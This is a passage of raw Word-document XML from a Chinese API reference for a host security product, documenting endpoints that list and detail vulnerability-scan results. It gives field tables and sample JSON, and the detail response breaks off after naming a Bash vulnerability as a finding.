        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/poc/linux/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D1AEFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F32A05C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643EC6B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759ED10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/poc/{linux|win}/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE85A73" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE2CD3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "d27260c9bb52d82c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "hostname": "yongliang",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "5c3d9930871e1b31a1c5c2c1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vulId": "QT042014001964",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8605F"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694"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1DF409A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FC5F3CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6826F0C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38EF5B42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="518CB477" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C39E675" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36223B82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A51B1C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B1E3168" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="205A1DE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>这条扫描结果的唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39436472" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="144AF18B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A212F93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="062AD839" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34B5B090" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="00EEB741" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="697144F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39700350" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="193BDB66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="285C8889" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="58BA6B9E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60F8F707" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectinIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A29AD26" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BE4556F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41AE59DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C3F56E8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02BF81AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07DE1481" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DC53FC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="432BA3FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2DA48FC1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24F60A5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DF7F325" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C377AC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="776D0D4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6439236A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D2BA2ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E162056" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21E34C99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27FE5CC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F9E19F0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F108866" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="384DAAAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16990E1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08BEED31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D8F5D76" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F55DB51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BCB5EB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73FD2D01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52B464E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5F91F9BB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30016184" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4006E34A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="634A5BA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36AB2AB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A3DD9BF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E265991" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2046F954" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DD7C37C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39736030" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="653FC1B3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51D732BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C1E834" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74F5FC89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE61852" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4D01D72B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59F6EDE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7111BD1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5090E796" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62114E9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AA8694E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="查询漏洞风险详情"/>
      <w:bookmarkEnd w:id="115"/>
      <w:r>
        <w:t>查询漏洞风险详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DCC9A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762FD55D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/poc/{linux|win}/{recordId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2419539D"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15"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1988"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7905637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AA96734" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FE9266F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E744392" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D510A50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5DF9C79E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EC5EC93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>recordId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A11B883" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44E0761F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="722058C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描结果的唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="526BDAA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAF315A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/poc/linux/5c3d9930871e1b31a1c5c2c1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7204FB85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44321580" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "vulId": "QT042014001966",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "vulName": "Bash环境变量远程命令执行漏洞(CVE-2014-7169)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "apps": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "Bash"</w:t>
      </w:r>
      <w:r>
